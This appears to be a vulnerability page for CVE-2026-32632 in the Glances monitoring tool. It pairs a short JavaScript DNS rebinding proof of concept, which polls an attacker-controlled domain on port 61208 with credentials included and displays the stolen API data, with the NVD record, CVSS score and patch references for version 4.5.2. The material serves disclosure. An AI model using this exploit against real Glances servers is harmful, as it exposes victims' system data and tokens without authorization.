CVE-2026-32632

// CVE-2026-32632 DNS Rebinding PoC (Conceptual) // This PoC demonstrates the DNS rebinding attack concept // Step 1: Attacker sets up DNS that first resolves to attacker server, then to target // Domain: attacker-controlled-domain.com // Initial TTL: Very short (e.g., 1 second) // DNS A record: Points to attacker server first, then target IP // Step 2: Victim visits attacker's page with this JavaScript const targetUrl = 'http://attacker-controlled-domain.com:61208/api/3/cpu'; async function exploit() { try { // First request - will hit attacker server (bypasses CORS if needed) const response = await fetch(targetUrl, { credentials: 'include' // Include cookies/tokens }); const data = await response.json(); console.log('Glances API Response:', data); // Extract sensitive data or perform actions document.getElementById('result').innerHTML = JSON.stringify(data); } catch (error) { console.error('Attack failed:', error); } } // Poll for data after DNS rebinding occurs setInterval(exploit, 1000); // Step 3: After DNS TTL expires, the domain now resolves to target Glances server // Browser considers it same-origin, sends auth cookies/tokens // Attacker can now access Glances API with victim's credentials

{"cve": {"id": "CVE-2026-32632", "sourceIdentifier": "[email protected]", "published": "2026-03-18T18:16:28.760", "lastModified": "2026-03-19T19:06:36.183", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Glances is an open-source system cross-platform monitoring tool. Glances recently added DNS rebinding protection for the MCP endpoint, but prior to version 4.5.2, the main REST/WebUI FastAPI application still accepts arbitrary `Host` headers and does not apply `TrustedHostMiddleware` or an equivalent host allowlist. As a result, the REST API, WebUI, and token endpoint remain reachable through attacker-controlled domains in classic DNS rebinding scenarios. Once the victim browser has rebound the attacker domain to the Glances service, same-origin policy no longer protects the API because the browser considers the rebinding domain to be the origin. This is a distinct issue from the previously reported default CORS weakness. CORS is not required for exploitation here because DNS rebinding causes the victim browser to treat the malicious domain as same-origin with the rebinding target. Version 4.5.2 contains a patch for the issue."}, {"lang": "es", "value": "Glances es una herramienta de monitoreo de sistema de código abierto multiplataforma. Glances añadió recientemente protección contra DNS rebinding para el endpoint MCP, pero antes de la versión 4.5.2, la aplicación principal FastAPI REST/WebUI todavía acepta encabezados 'Host' arbitrarios y no aplica 'TrustedHostMiddleware' o una lista de permitidos de host equivalente. Como resultado, la API REST, la WebUI y el endpoint de token permanecen accesibles a través de dominios controlados por el atacante en escenarios clásicos de DNS rebinding. Una vez que el navegador víctima ha reasociado el dominio del atacante al servicio Glances, la política de mismo origen ya no protege la API porque el navegador considera que el dominio de reasociación es el origen. Este es un problema distinto de la debilidad CORS predeterminada reportada anteriormente. CORS no es necesario para la explotación aquí porque el DNS rebinding hace que el navegador víctima trate el dominio malicioso como de mismo origen con el objetivo de rebinding. La versión 4.5.2 contiene un parche para el problema."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:L/A:N", "baseScore": 5.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.6, "impactScore": 4.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-346"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:nicolargo:glances:*:*:*:*:*:*:*:*", "versionEndExcluding": "4.5.2", "matchCriteriaId": "3FC19E01-80F1-43BB-912C-39FE99143A59"}]}]}], "references": [{"url": "https://github.com/nicolargo/glances/commit/5850c564ee10804fdf884823b9c210eb954dd1f9", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/nicolargo/glances/releases/tag/v4.5.2", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://github.com/nicolargo/glances/security/advisories/GHSA-hhcg-r27j-fhv9", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}, {"url": "https://github.com/nicolargo/glances/security/advisories/GHSA-hhcg-r27j-fhv9", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Vendor Advisory"]}]}}